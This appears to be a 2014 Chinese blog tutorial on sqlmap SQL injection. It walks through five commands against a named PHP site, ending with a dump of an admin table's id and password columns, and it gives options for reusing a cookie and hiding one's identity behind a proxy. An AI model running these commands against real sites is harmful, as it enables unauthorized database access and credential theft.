安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > sqlmap注入常见用法一条龙

sqlmap注入常见用法一条龙

时间:2014-12-31来源: 作者:点击:
sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起

sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:

//安云网,anyun.org

  1. 检查注入点

    //ANYUN.ORG

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 
    //安云网咨询系统
  2. 列数据库信息

    //copyright AnYun.ORG

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs 
    //copyright AnYun.ORG
  3. 指定库名列出所有表

    //安云网,anyun.org

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables 
    //安云网咨询系统
  4. 指定库名表名列出所有字段 //本文来自安云网

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns //安云网,anyun.org 
  5. 指定库名表名字段dump出指定字段 //安云网咨询系统

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump 

    //内容来自安云网

有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档//ANYUN.ORG

  • --cookie=COOKIE                 在需要登录的地方,需要登录后的cookie
    --proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等
    --sql-query=QUERY               执行一个sql语句,不一定支持 //安云网咨询系统 

过程的几张图如下:  //安云网,anyun.org

sqlmap step1 

//安云网咨询系统

sqlmap step2

//本文来自安云网

sqlmap step3 

//ANYUN.ORG

sqlmap step4

//ANYUN.ORG

sqlmap-step6 //内容来自AnYun.ORG


//安云网咨询系统

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容